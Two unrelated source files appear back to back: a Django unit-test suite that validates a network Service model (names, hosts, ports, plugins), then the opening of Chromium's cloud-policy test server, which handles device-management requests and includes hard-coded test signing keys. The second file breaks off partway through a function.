self.smb = models.Plugin.objects.get(name='smb')
def test_malformed_service(self):
"""Should not be able to create services with malformed data"""
# Too little data
with self.assertRaises(ValidationError):
models.Service.objects.create()
with self.assertRaises(ValidationError):
models.Service.objects.create(name='Service1')
with self.assertRaises(ValidationError):
models.Service.objects.create(subnet_host=2)
with self.assertRaises(ValidationError):
models.Service.objects.create(port=80)
with self.assertRaises(ValidationError):
models.Service.objects.create(plugin=self.http)
with self.assertRaises(ValidationError):
models.Service.objects.create(name='Service1', subnet_host=1)
with self.assertRaises(ValidationError):
models.Service.objects.create(name='Service1', port=90)
with self.assertRaises(ValidationError):
models.Service.objects.create(name='Service1', plugin=self.http)
with self.assertRaises(ValidationError):
models.Service.objects.create(subnet_host=2, port=93)
with self.assertRaises(ValidationError):
models.Service.objects.create(subnet_host=2, plugin=self.smb)
with self.assertRaises(ValidationError):
models.Service.objects.create(port=2, plugin=self.smb)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service1', subnet_host=2, port=44)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service1', subnet_host=32, plugin=self.smb)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service1', port=32, plugin=self.smb)
with self.assertRaises(ValidationError):
models.Service.objects.create(
subnet_host=38, port=32, plugin=self.smb)
# Malformed arguments
## Name
with self.assertRaises(ValidationError): # Name is None
models.Service.objects.create(
name=None, subnet_host=1, port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Name is empty
models.Service.objects.create(
name='', subnet_host=1, port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Name is too long
models.Service.objects.create(
name='a'*21, subnet_host=1, port=93, plugin=self.http)
## Subnet_host
with self.assertRaises(ValidationError): # Subnet_host is None
models.Service.objects.create(
name='Service', subnet_host=None, port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Subnet_host is not a number
models.Service.objects.create(
name='Service', subnet_host='hi', port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Subnet_host is negative
models.Service.objects.create(
name='Service', subnet_host=-1, port=93, plugin=self.http)
# Port
with self.assertRaises(ValidationError): # Port is None
models.Service.objects.create(
name='Service', subnet_host=1, port=None, plugin=self.http)
with self.assertRaises(ValidationError): # Port is not a number
models.Service.objects.create(
name='Service', subnet_host=1, port='oh', plugin=self.http)
with self.assertRaises(ValidationError): # Port is negative
models.Service.objects.create(
name='Service', subnet_host=1, port=-1, plugin=self.http)
with self.assertRaises(ValidationError): # Port is outside port range
models.Service.objects.create(
name='Service', subnet_host=1, port=65536, plugin=self.http)
with self.assertRaises(ValidationError): # Port is outside port range
models.Service.objects.create(
name='Service', subnet_host=1, port=0, plugin=self.http)
# Plugin
with self.assertRaises(ValidationError): # Plugin is None
models.Service.objects.create(
name='Service', subnet_host=1, port=15, plugin=None)
with self.assertRaises(ValueError): # Plugin is not a model object
models.Service.objects.create(
name='Service', subnet_host=1, port=15, plugin='http')
def test_service_same_names(self):
"""Services with the same name are not allowed"""
models.Service.objects.create(
name='Service1', subnet_host=1, port=30, plugin=self.http)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service1', subnet_host=2, port=38, plugin=self.http)
def test_service_same_host_port(self):
"""Services with the same host/port combo are not allowed"""
models.Service.objects.create(
name='Service1', subnet_host=1, port=30, plugin=self.http)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service2', subnet_host=1, port=30, plugin=self.smb)
def test_service_correct(self):
"""Correctly created services should be allowed"""
self.assertEqual(models.Service.objects.count(), 0)
models.Service.objects.create(
name='Service1', subnet_host=1, port=80, plugin=self.http)
self.assertEqual(models.Service.objects.count(), 1)
models.Service.objects.create(
name='Service2', subnet_host=4, port=38, plugin=self.smb)
self.assertEqual(models.Service.objects.count(), 2)
models.Service.objects.create( # Same host different port
name='Service3', subnet_host=1, port=38, plugin=self.http)
self.assertEqual(models.Service.objects.count(), 3)
models.Service.objects.create( # Different host same port
name='Service4', subnet_host=2, port=80, plugin=self.http)
self.assertEqual(models.Service.objects.count(), 4)
def test_service_plugin_delete_cascade(self):
"""When a service's plugin is deleted, the service is also deleted"""
models.Service.objects.create(
name='Service', subnet_host=5, port=39, plugin=self.http)
self.assertEqual(models.Service.objects.count(), 1)
self.http.delete()
self.assertEqual(models.Service.objects.count(), 0)
def test_service_ip_calculation(self):
"""IPs should be properly calculated from subnet and netmask"""
s1 = models.Service.objects.create(
name='Service1', subnet_host=3, port=28, plugin=self.http)
s2 = models.Service.objects.create(
name='Service2', subnet_host=15, port=28, plugin=self.http)
ip1 = s1.ip('192.168.1.0', '255.255.255.0')
self.assertEqual(ip1, '192.168.1.3')
ip2 = s2.ip('192.168.1.0', '255.255.255.0')
self.assertEqual(ip2, '192.168.1.15')
ip3 = s1.ip('192.168.1.0', '255.255.255.128')
self.assertEqual(ip3, '192.168.1.3')
ip4 = s2.ip('192.168.1.128', '255.255.255.128')
self.assertEqual(ip4, '192.168.1.143')
def test_service_malformed_edit(self):
"""Services should raise an error when edited with malformed data"""
s = models.Service.objects.create(
name='Service', subnet_host=1, port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Name is None
s.name = None
s.save()
with self.assertRaises(ValidationError): # Name is empty
s.name = ''
s.save()
with self.assertRaises(ValidationError): # Name is too long
s.name = 'a'*21
s.save()
## Subnet_host
with self.assertRaises(ValidationError): # Subnet_host is None
s.subnet_host = None
s.save()
with self.assertRaises(ValidationError): # Subnet_host is not a number
s.subnet_host = 'hi'
s.save()
with self.assertRaises(ValidationError): # Subnet_host is negative
s.subnet_host = -1
s.save()
# Port
with self.assertRaises(ValidationError): # Port is None
s.port = None
s.save()
with self.assertRaises(ValidationError): # Port is not a number
s.port = 'oh'
s.save()
with self.assertRaises(ValidationError): # Port is negative
s.port = -1
s.save()
with self.assertRaises(ValidationError): # Port is outside port range
s.port = 65536
s.save()
with self.assertRaises(ValidationError): # Port is outside port range
s.port = 0
s.save()
# Plugin
with self.assertRaises(ValidationError): # Plugin is None
s.plugin = None
s.save()
with self.assertRaises(ValueError): # Plugin is not a model object
s.plugin = 'http'
s.save()
def test_service_edit(self):
"""Service fields should be updated when properly edited"""
s = models.Service.objects.create(
name='Service', subnet_host=1, port=93, plugin=self.http)
s.name = 'kdkdkdkd'
s.save()
s = models.Service.objects.get(pk=s.pk)
self.assertEqual(s.name, 'kdkdkdkd')
s.subnet_host = 5
s.save()
s = models.Service.objects.get(pk=s.pk)
self.assertEqual(s.subnet_host, 5)
s.port = 5
s.save()
s = models.Service.objects.get(pk=s.pk)
self.assertEqual(s.port, 5)
s.plugin = self.smb
s.save()
s = models.Service.objects.get(pk=s.pk)
self.assertEqual(s.plugin, self.smb)
def test_service_edit_same_names(self):
"""Services with the same name are not allowed when editing"""
models.Service.objects.create(
name='Service1', subnet_host=1, port=30, plugin=self.http)
s = models.Service.objects.create(
name='Service2', subnet_host=2, port=38, plugin=self.http)
with self.assertRaises(ValidationError):
s.name = 'Service1'
s.save()
def test_service_edit_same_host_port(self):
"""Services with the same host/port combo are not allowed
when editing"""
models.Service.objects.create(
name='Service1', subnet_host=1, port=30, plugin=self.http)
s = models.Service.objects.create(
name='Service2', subnet_host=2, port=30, plugin=self.smb)
with self.assertRaises(ValidationError):
s.subnet_host = 1
s.save()
s = models.Service.objects.create(
name='Service3', subnet_host=1, port=50, plugin=self.smb)
with self.assertRaises(ValidationError):
s.port = 30
s.save()
|
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A bare-bones test server for testing cloud policy support.
This implements a simple cloud policy test server that can be used to test
chrome's device management service client. The policy information is read from
the file named device_management in the server's data directory. It contains
enforced and recommended policies for the device and user scope, and a list
of managed users.
The format of the file is JSON. The root dictionary contains a list under the
key "managed_users". It contains auth tokens for which the server will claim
that the user is managed. The token string "*" indicates that all users are
claimed to be managed. Other keys in the root dictionary identify request
scopes. The user-request scope is described by a dictionary that holds two
sub-dictionaries: "mandatory" and "recommended". Both these hold the policy
definitions as key/value stores, their format is identical to what the Linux
implementation reads from /etc.
The device-scope holds the policy-definition directly as key/value stores in the
protobuf-format.
Example:
{
"google/chromeos/device" : {
"guest_mode_enabled" : false
},
"google/chromeos/user" : {
"mandatory" : {
"HomepageLocation" : "http://www.chromium.org",
"IncognitoEnabled" : false
},
"recommended" : {
"JavascriptEnabled": false
}
},
"google/chromeos/publicaccount/user@example.com" : {
"mandatory" : {
"HomepageLocation" : "http://www.chromium.org"
},
"recommended" : {
}
},
"managed_users" : [
"secret123456"
],
"current_key_index": 0,
"robot_api_auth_code": "",
"invalidation_source": 1025,
"invalidation_name": "UENUPOL"
}
"""
import base64
import BaseHTTPServer
import cgi
import glob
import google.protobuf.text_format
import hashlib
import json
import logging
import os
import random
import re
import sys
import time
import tlslite
import tlslite.api
import tlslite.utils
import tlslite.utils.cryptomath
import urllib
import urllib2
import urlparse
import asn1der
import testserver_base
import device_management_backend_pb2 as dm
import cloud_policy_pb2 as cp
# Policy for extensions is not supported on Android nor iOS.
try:
import chrome_extension_policy_pb2 as ep
except ImportError:
ep = None
# Device policy is only available on Chrome OS builds.
try:
import chrome_device_policy_pb2 as dp
except ImportError:
dp = None
# ASN.1 object identifier for PKCS#1/RSA.
PKCS1_RSA_OID = '\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01'
# List of bad machine identifiers that trigger the |valid_serial_number_missing|
# flag to be set set in the policy fetch response.
BAD_MACHINE_IDS = [ '123490EN400015' ]
# List of machines that trigger the server to send kiosk enrollment response
# for the register request.
KIOSK_MACHINE_IDS = [ 'KIOSK' ]
# Dictionary containing base64-encoded policy signing keys plus per-domain
# signatures. Format is:
# {
# 'key': <base64-encoded PKCS8-format private key>,
# 'signatures': {
# <domain1>: <base64-encdoded SHA256 signature for key + domain1>
# <domain2>: <base64-encdoded SHA256 signature for key + domain2>
# ...
# }
# }
SIGNING_KEYS = [
# Key1
{'key':
'MIIBVQIBADANBgkqhkiG9w0BAQEFAASCAT8wggE7AgEAAkEA2c3KzcPqvnJ5HCk3OZkf1'
'LMO8Ht4dw4FO2U0EmKvpo0zznj4RwUdmKobH1AFWzwZP4CDY2M67MsukE/1Jnbx1QIDAQ'
'ABAkBkKcLZa/75hHVz4PR3tZaw34PATlfxEG6RiRIwXlf/FFlfGIZOSxdW/I1A3XRl0/9'
'nZMuctBSKBrcTRZQWfT/hAiEA9g8xbQbMO6BEH/XCRSsQbPlvj4c9wDtVEzeAzZ/ht9kC'
'IQDiml+/lXS1emqml711jJcYJNYJzdy1lL/ieKogR59oXQIhAK+Pl4xa1U2VxAWpq7r+R'
'vH55wdZT03hB4p2h4gvEzXBAiAkw9kvE0eZPiBZoRrrHIFTOH7FnnHlwBmV2+/2RsiVPQ'
'IhAKqx/4qisivvmoM/xbzUagfoxwsu1A/4mGjhBKiS0BCq',
'signatures':
{'example.com':
'l+sT5mziei/GbmiP7VtRCCfwpZcg7uKbW2OlnK5B/TTELutjEIAMdHduNBwbO44qOn'
'/5c7YrtkXbBehaaDYFPGI6bGTbDmG9KRxhS+DaB7opgfCQWLi79Gn/jytKLZhRN/VS'
'y+PEbezqMi3d1/xDxlThwWZDNwnhv9ER/Nu/32ZTjzgtqonSn2CQtwXCIILm4FdV/1'
'/BdmZG+Ge4i4FTqYtInir5YFe611KXU/AveGhQGBIAXo4qYg1IqbVrvKBSU9dlI6Sl'
'9TJJLbJ3LGaXuljgFhyMAl3gcy7ftC9MohEmwa+sc7y2mOAgYQ5SSmyAtQwQgAkX9J'
'3+tfxjmoA/dg==',
'chromepolicytest.com':
'TzBiigZKwBdr6lyP6tUDsw+Q9wYO1Yepyxm0O4JZ4RID32L27sWzC1/hwC51fRcCvP'
'luEVIW6mH+BFODXMrteUFWfbbG7jgV+Wg+QdzMqgJjxhNKFXPTsZ7/286LAd1vBY/A'
'nGd8Wog6AhzfrgMbLNsH794GD0xIUwRvXUWFNP8pClj5VPgQnJrIA9aZwW8FNGbteA'
'HacFB0T/oqP5s7XT4Qvkj14RLmCgTwEM8Vcpqy5teJaF8yN17wniveddoOQGH6s0HC'
'ocprEccrH5fP/WVAPxCfx4vVYQY5q4CZ4K3f6dTC2FV4IDelM6dugEkvSS02YCzDaO'
'N+Z7IwElzTKg==',
'managedchrome.com':
'T0wXC5w3GXyovA09pyOLX7ui/NI603UfbZXYyTbHI7xtzCIaHVPH35Nx4zdqVrdsej'
'ErQ12yVLDDIJokY4Yl+/fj/zrkAPxThI+TNQ+jo0i+al05PuopfpzvCzIXiZBbkbyW'
'3XfedxXP3IPN2XU2/3vX+ZXUNG6pxeETem64kGezkjkUraqnHw3JVzwJYHhpMcwdLP'
'PYK6V23BbEHEVBtQZd/ledXacz7gOzm1zGni4e+vxA2roAdJWyhbjU0dTKNNUsZmMv'
'ryQH9Af1Jw+dqs0RAbhcJXm2i8EUWIgNv6aMn1Z2DzZwKKjXsKgcYSRo8pdYa8RZAo'
'UExd9roA9a5w==',
}
},
# Key2
{'key':
'MIIBVAIBADANBgkqhkiG9w0BAQEFAASCAT4wggE6AgEAAkEAmZhreV04M3knCi6wibr49'
'oDesHny1G33PKOX9ko8pcxAiu9ZqsKCj7wNW2PGqnLi81fddACwQtYn5xdhCtzB9wIDAQ'
'ABAkA0z8m0cy8N08xundspoFZWO71WJLgv/peSDBYGI0RzJR1l9Np355EukQUQwRs5XrL'
'3vRQZy2vDqeiR96epkAhRAiEAzJ4DVI8k3pAl7CGv5icqFkJ02viExIwehhIEXBcB6p0C'
'IQDAKmzpoRpBEZRQ9xrTvPOi+Ea8Jnd478BU7CI/LFfgowIgMfLIoVWoDGRnvXKju60Hy'
'xNB70oHLut9cADp64j6QMkCIDrgxN4QbmrhaAAmtiGKE1wrlgCwCIsVamiasSOKAqLhAi'
'EAo/ItVcFtQPod97qG71CY/O4JzOciuU6AMhprs181vfM=',
'signatures':
# Key2 signatures
{'example.com':
'cO0nQjRptkeefKDw5QpJSQDavHABxUvbR9Wvoa235OG9Whw1RFqq2ye6pKnI3ezW6/'
'7b4ANcpi5a7HV5uF8K7gWyYdxY8NHLeyrbwXxg5j6HAmHmkP1UZcf/dAnWqo7cW8g4'
'DIQOhC43KkveMYJ2HnelwdXt/7zqkbe8/3Yj4nhjAUeARx86Sb8Nzydwkrvqs5Jw/x'
'5LG+BODExrXXcGu/ubDlW4ivJFqfNUPQysqBXSMY2XCHPJDx3eECLGVVN/fFAWWgjM'
'HFObAriAt0b18cc9Nr0mAt4Qq1oDzWcAHCPHE+5dr8Uf46BUrMLJRNRKCY7rrsoIin'
'9Be9gs3W+Aww==',
'chromepolicytest.com':
'mr+9CCYvR0cTvPwlzkxqlpGYy55gY7cPiIkPAPoql51yHK1tkMTOSFru8Dy/nMt+0o'
'4z7WO60F1wnIBGkQxnTj/DsO6QpCYi7oHqtLmZ2jsLQFlMyvPGUtpJEFvRwjr/TNbh'
'6RqUtz1LQFuJQ848kBrx7nkte1L8SuPDExgx+Q3LtbNj4SuTdvMUBMvEERXiLuwfFL'
'BefGjtsqfWETQVlJTCW7xcqOLedIX8UYgEDBpDOZ23A3GzCShuBsIut5m87R5mODht'
'EUmKNDK1+OMc6SyDpf+r48Wph4Db1bVaKy8fcpSNJOwEgsrmH7/+owKPGcN7I5jYAF'
'Z2PGxHTQ9JNA==',
'managedchrome.com':
'o5MVSo4bRwIJ/aooGyXpRXsEsWPG8fNA2UTG8hgwnLYhNeJCCnLs/vW2vdp0URE8jn'
'qiG4N8KjbuiGw0rJtO1EygdLfpnMEtqYlFjrOie38sy92l/AwohXj6luYzMWL+FqDu'
'WQeXasjgyY4s9BOLQVDEnEj3pvqhrk/mXvMwUeXGpbxTNbWAd0C8BTZrGOwU/kIXxo'
'vAMGg8L+rQaDwBTEnMsMZcvlrIyqSg5v4BxCWuL3Yd2xvUqZEUWRp1aKetsHRnz5hw'
'H7WK7DzvKepDn06XjPG9lchi448U3HB3PRKtCzfO3nD9YXMKTuqRpKPF8PeK11CWh1'
'DBvBYwi20vbQ==',
},
},
]
class PolicyRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Decodes and handles device management requests from clients.
The handler implements all the request parsing and protobuf message decoding
and encoding. It calls back into the server to lookup, register, and
unregister clients.
"""
def __init__(self, request, client_address, server):
"""Initialize the handler.
Args:
request: The request data received from the client as a string.
client_address: The client address.
server: The TestServer object to use for (un)registering clients.
"""
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, request,
client_address, server)
def GetUniqueParam(self, name):
"""Extracts a unique query parameter from the request.
Args:
name: Names the parameter to fetch.
Returns:
The parameter value or None if the parameter doesn't exist or is not
unique.
"""
if not hasattr(self, '_params'):
self._params = cgi.parse_qs(self.path[self.path.find('?') + 1:])
param_list = self._params.get(name, [])
if len(param_list) == 1:
return param_list[0]
return None
def do_GET(self):
"""Handles GET requests.
Currently this is only used to serve external policy data."""
sep = self.path.find('?')
path = self.path if sep == -1 else self.path[:sep]
if path == '/externalpolicydata':
http_response, raw_reply = self.HandleExternalPolicyDataRequest()
elif path == '/configuration/test/exit':
# This is not part of the standard DM server protocol.
# This extension is added to make the test server exit gracefully
# when the test is complete.
self.server.stop = True
http_response = 200
raw_reply = 'OK'
elif path == '/test/ping':
# This path and reply are used by the test setup of host-driven tests for
# Android to determine if the server is up, and are not part of the
# DM protocol.
http_response = 200
raw_reply = 'Policy server is up.'
else:
http_response = 404
raw_reply = 'Invalid path'
self.send_response(http_response)
self.end_headers()
self.wfile.write(raw_reply)
def do_POST(self):
http_response, raw_reply = self.HandleRequest()
self.send_response(http_response)
if (http_response == 200):
self.send_header('Content-Type', 'application/x-protobuffer')
self.end_headers()
self.wfile.write(raw_reply)
def HandleExternalPolicyDataRequest(self):
"""Handles a request to download policy data for a component."""
policy_key = self.GetUniqueParam('key')
if not policy_key:
return (400, 'Missing key parameter')
data = self.server.ReadPolicyDataFromDataDir(policy_key)
if data is None:
return (404, 'Policy not found for ' + policy_key)
return (200, data)
def HandleRequest(self):
"""Handles a request.
Parses the data supplied at construction time and returns a pair indicating
http status code and response data to be sent back to the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
rmsg = dm.DeviceManagementRequest()
length = int(self.headers.getheader('content-length'))
rmsg.ParseFromString(self.rfile.read(length))
logging.debug('gaia auth token -> ' +
self.headers.getheader('Authorization', ''))
logging.debug('oauth token -> ' + str(self.GetUniqueParam('oauth_token')))
logging.debug('deviceid -> ' + str(self.GetUniqueParam('deviceid')))
self.DumpMessage('Request', rmsg)
request_type = self.GetUniqueParam('request')
# Check server side requirements, as defined in
# device_management_backend.proto.
if (self.GetUniqueParam('devicetype') != '2' or
self.GetUniqueParam('apptype') != 'Chrome' or
len(self.GetUniqueParam('deviceid')) >= 64):
return (400, 'Invalid request parameter')
if request_type == 'register':
response = self.ProcessRegister(rmsg.register_request)
elif request_type == 'api_authorization':
response = self.ProcessApiAuthorization(rmsg.service_api_access_request)
elif request_type == 'unregister':
response = self.ProcessUnregister(rmsg.unregister_request)
elif request_type == 'policy':
response = self.ProcessPolicy(rmsg, request_type)
elif request_type == 'enterprise_check':
response = self.ProcessAutoEnrollment(rmsg.auto_enrollment_request)
elif request_type == 'device_state_retrieval':
response = self.ProcessDeviceStateRetrievalRequest(
rmsg.device_state_retrieval_request)
elif request_type == 'status_upload':
response = self.ProcessStatusUploadRequest(
rmsg.device_status_report_request, rmsg.session_status_report_request)
else:
return (400, 'Invalid request parameter')
if isinstance(response[1], basestring):
body = response[1]
elif isinstance(response[1], google.protobuf.message.Message):
self.DumpMessage('Response', response[1])
body = response[1].SerializeToString()
else:
body = ''
return (response[0], body)
def CreatePolicyForExternalPolicyData(self, policy_key):
"""Returns an ExternalPolicyData protobuf for policy_key.
If there is policy data for policy_key then the download url will be
set so that it points to that data, and the appropriate hash is also set.
Otherwise, the protobuf will be empty.
Args:
policy_key: The policy type and settings entity id, joined by '/'.
Returns:
A serialized ExternalPolicyData.
"""
settings = ep.ExternalPolicyData()
data = self.server.ReadPolicyDataFromDataDir(policy_key)
if data:
settings.download_url = urlparse.urljoin(
self.server.GetBaseURL(), 'externalpolicydata?key=%s' % policy_key)
settings.secure_hash = hashlib.sha256(data).digest()
return settings.SerializeToString()
def CheckGoogleLogin(self):
"""Extracts the auth token from the request and returns it. The token may
either be a GoogleLogin token from an Authorization header, or an OAuth V2
token from the oauth_token query parameter. Returns None if no token is
present.
"""
oauth_token = self.GetUniqueParam('oauth_token')
if oauth_token:
return oauth_token
match = re.match('GoogleLogin auth=(\\w+)',
self.headers.getheader('Authorization', ''))
if match:
return match.group(1)
return None
def ProcessRegister(self, msg):
"""Handles a register request.
Checks the query for authorization and device identifier, registers the
device with the server and constructs a response.
Args:
msg: The DeviceRegisterRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Check the auth token and device ID.
auth = self.CheckGoogleLogin()
if not auth:
return (403, 'No authorization')
policy = self.server.GetPolicies()
if ('managed_users' not in policy):
return (500, 'error in config - no managed users')
username = self.server.ResolveUser(auth)
if ('*' not in policy['managed_users'] and
username not in policy['managed_users']):
return (403, 'Unmanaged')
device_id = self.GetUniqueParam('deviceid')
if not device_id:
return (400, 'Missing device identifier')
token_info = self.server.RegisterDevice(
device_id, msg.machine_id, msg.type, username)
# Send back the reply.
response = dm.DeviceManagementResponse()
response.register_response.device_management_token = (
token_info['device_token'])
response.register_response.machine_name = token_info['machine_name']
response.register_response.enrollment_type = token_info['enrollment_mode']
return (200, response)
def ProcessApiAuthorization(self, msg):
"""Handles an API authorization request.
Args:
msg: The DeviceServiceApiAccessRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
policy = self.server.GetPolicies()
# Return the auth code from the config file if it's defined. Default to an
# empty auth code, which will instruct the enrollment flow to skip robot
# auth setup.
response = dm.DeviceManagementResponse()
response.service_api_access_response.auth_code = policy.get(
'robot_api_auth_code', '')
return (200, response)
def ProcessUnregister(self, msg):
"""Handles a register request.
Checks for authorization, unregisters the device and constructs the
response.
Args:
msg: The DeviceUnregisterRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Check the management token.
token, response = self.CheckToken()
if not token:
return response
# Unregister the device.
self.server.UnregisterDevice(token['device_token'])
# Prepare and send the response.
response = dm.DeviceManagementResponse()
response.unregister_response.CopyFrom(dm.DeviceUnregisterResponse())
return (200, response)
def ProcessPolicy(self, msg, request_type):
"""Handles a policy request.
Checks for authorization, encodes the policy into protobuf representation
and constructs the response.
Args:
msg: The DeviceManagementRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
token_info, error = self.CheckToken()
if not token_info:
return error
key_update_request = msg.device_state_key_update_request
if len(key_update_request.server_backed_state_key) > 0:
self.server.UpdateStateKeys(token_info['device_token'],
key_update_request.server_backed_state_key)
# See whether the |username| for the client is known. During policy
# validation, the client verifies that the policy blob is bound to the
# appropriate user by comparing against this value. In case the server is
# configured to resolve the actual user name from the access token via the
# token info endpoint, the resolved |username| has been stored in
# |token_info| when the client registered. If not, pass None as the
# |username| in which case a value from the configuration file will be used.
username = token_info.get('username')
# If this is a |publicaccount| request, use the |settings_entity_id| from
# the request as the |username|. This is required to validate policy for
# extensions in device-local accounts.
for request in msg.policy_request.request:
if request.policy_type == 'google/chromeos/publicaccount':
username = request.settings_entity_id
response = dm.DeviceManagementResponse()
for request in msg.policy_request.request:
if (request.policy_type in
('google/android/user',
'google/chromeos/device',
'google/chromeos/publicaccount',
'google/chromeos/user',
'google/chrome/user',
'google/ios/user')):
fetch_response = response.policy_response.response.add()
self.ProcessCloudPolicy(request, token_info, fetch_response, username)
elif request.policy_type == 'google/chrome/extension':
self.ProcessCloudPolicyForExtensions(
request, response.policy_response, token_info, username)
else:
fetch_response.error_code = 400
fetch_response.error_message = 'Invalid policy_type'
return (200, response)
def ProcessAutoEnrollment(self, msg):
"""Handles an auto-enrollment check request.
The reply depends on the value of the modulus:
1: replies with no new modulus and the sha256 hash of "0"
2: replies with a new modulus, 4.
4: replies with a new modulus, 2.
8: fails with error 400.
16: replies with a new modulus, 16.
32: replies with a new modulus, 1.
anything else: replies with no new modulus and an empty list of hashes
These allow the client to pick the testing scenario its wants to simulate.
Args:
msg: The DeviceAutoEnrollmentRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
auto_enrollment_response = dm.DeviceAutoEnrollmentResponse()
if msg.modulus == 1:
auto_enrollment_response.hash.extend(
self.server.GetMatchingStateKeyHashes(msg.modulus, msg.remainder))
elif msg.modulus == 2:
auto_enrollment_response.expected_modulus = 4
elif msg.modulus == 4:
auto_enrollment_response.expected_modulus = 2
elif msg.modulus == 8:
return (400, 'Server error')
elif msg.modulus == 16:
auto_enrollment_response.expected_modulus = 16
elif msg.modulus == 32:
auto_enrollment_response.expected_modulus = 1
response = dm.DeviceManagementResponse()
response.auto_enrollment_response.CopyFrom(auto_enrollment_response)
return (200, response)
def ProcessDeviceStateRetrievalRequest(self, msg):
"""Handles a device state retrieval request.
Response data is taken from server configuration.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
device_state_retrieval_response = dm.DeviceStateRetrievalResponse()
client = self.server.LookupByStateKey(msg.server_backed_state_key)
if client is not None:
state = self.server.GetPolicies().get('device_state', {})
FIELDS = [
'management_domain',
'restore_mode',
]
for field in FIELDS:
if field in state:
setattr(device_state_retrieval_response, field, state[field])
response = dm.DeviceManagementResponse()
response.device_state_retrieval_response.CopyFrom(
device_state_retrieval_response)
return (200, response)
def ProcessStatusUploadRequest(self, device_status, session_status):
"""Handles a device/session status upload request.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Empty responses indicate a successful upload.
device_status_report_response = dm.DeviceStatusReportResponse()
session_status_report_response = dm.SessionStatusReportResponse()
response = dm.DeviceManagementResponse()
response.device_status_report_response.CopyFrom(
device_status_report_response)
response.session_status_report_response.CopyFrom(
session_status_report_response)
return (200, response)
def SetProtobufMessageField(self, group_message, field, field_value):
"""Sets a field in a protobuf message.
Args:
group_message: The protobuf message.
field: The field of the message to set, it should be a member of
group_message.DESCRIPTOR.fields.
field_value: The value to set.
"""
if field.label == field.LABEL_REPEATED:
assert type(field_value) == list
entries = group_message.__getattribute__(field.name)
if field.message_type is None:
for list_item in field_value:
entries.append(list_item)
else:
# This field is itself a protobuf.
sub_type = field.message_type
for sub_value in field_value:
assert type(sub_value) == dict
# Add a new sub-protobuf per list entry.
sub_message = entries.add()
# Now iterate over its fields and recursively add them.
for sub_field in sub_message.DESCRIPTOR.fields:
if sub_field.name in sub_value:
value = sub_value[sub_field.name]
self.SetProtobufMessageField(sub_message, sub_field, value)
return
elif field.type == field.TYPE_BOOL:
assert type(field_value) == bool
elif field.type == field.TYPE_STRING:
assert type(field_value) == str or type(field_value) == unicode
elif field.type == field.TYPE_INT64:
assert type(field_value) == int
elif (field.type == field.TYPE_MESSAGE and
field.message_type.name == 'StringList'):
assert type(field_value) == list
entries = group_message.__getattribute__(field.name).entries
for list_item in field_value:
entries.append(list_item)
return
else:
raise Exception('Unknown field type %s' % field.type)
group_message.__setattr__(field.name, field_value)
def GatherDevicePolicySettings(self, settings, policies):
"""Copies all the policies from a dictionary into a protobuf of type
CloudDeviceSettingsProto.
Args:
settings: The destination ChromeDeviceSettingsProto protobuf.
policies: The source dictionary containing policies in JSON format.
"""
for group in settings.DESCRIPTOR.fields:
# Create protobuf message for group.
group_message = eval('dp.' + group.message_type.name + '()')
# Indicates if at least one field was set in |group_message|.
got_fields = False
# Iterate over fields of the message and feed them from the
# policy config file.
for field in group_message.DESCRIPTOR.fields:
field_value = None
if field.name in policies:
got_fields = True
field_value = policies[field.name]
self.SetProtobufMessageField(group_message, field, field_value)
if got_fields:
settings.__getattribute__(group.name).CopyFrom(group_message)
def GatherUserPolicySettings(self, settings, policies):
"""Copies all the policies from a dictionary into a protobuf of type
CloudPolicySettings.
Args:
settings: The destination: a CloudPolicySettings protobuf.
policies: The source: a dictionary containing policies under keys
'recommended' and 'mandatory'.
"""
for field in settings.DESCRIPTOR.fields:
# |field| is the entry for a specific policy in the top-level
# CloudPolicySettings proto.
# Look for this policy's value in the mandatory or recommended dicts.
if field.name in policies.get('mandatory', {}):
mode = cp.PolicyOptions.MANDATORY
value = policies['mandatory'][field.name]
elif field.name in policies.get('recommended', {}):
mode = cp.PolicyOptions.RECOMMENDED
value = policies['recommended'][field.name]
else:
continue
# Create protobuf message for this policy.
policy_message = eval('cp.' + field.message_type.name + '()')
policy_message.policy_options.mode = mode
field_descriptor = policy_message.DESCRIPTOR.fields_by_name['value']
self.SetProtobufMessageField(policy_message, field_descriptor, value)
settings.__getattribute__(field.name).CopyFrom(policy_message)
def ProcessCloudPolicyForExtensions(self, request, response, token_info,
username=None):
"""Handles a request for policy for extensions.
A request for policy for extensions is slightly different from the other
cloud policy requests, because it can trigger 0, one or many
PolicyFetchResponse messages in the response.
Args:
request: The PolicyFetchRequest that triggered this handler.
response: The DevicePolicyResponse message for the response. Multiple
PolicyFetchResponses will be appended to this message.
token_info: The token extracted from the request.
username: The username for the response. May be None.
"""
# Send one PolicyFetchResponse for each extension that has
# configuration data at the server.
ids = self.server.ListMatchingComponents('google/chrome/extension')
for settings_entity_id in ids:
# Reuse the extension policy request, to trigger the same signature
# type in the response.
request.settings_entity_id = settings_entity_id
fetch_response = response.response.add()
self.ProcessCloudPolicy(request, token_info, fetch_response, username)
# Don't do key rotations for these messages.
fetch_response.ClearField('new_public_key')
fetch_response.ClearField('new_public_key_signature')
fetch_response.ClearField('new_public_key_verification_signature')
def ProcessCloudPolicy(self, msg, token_info, response, username=None):
"""Handles a cloud policy request. (New protocol for policy requests.)
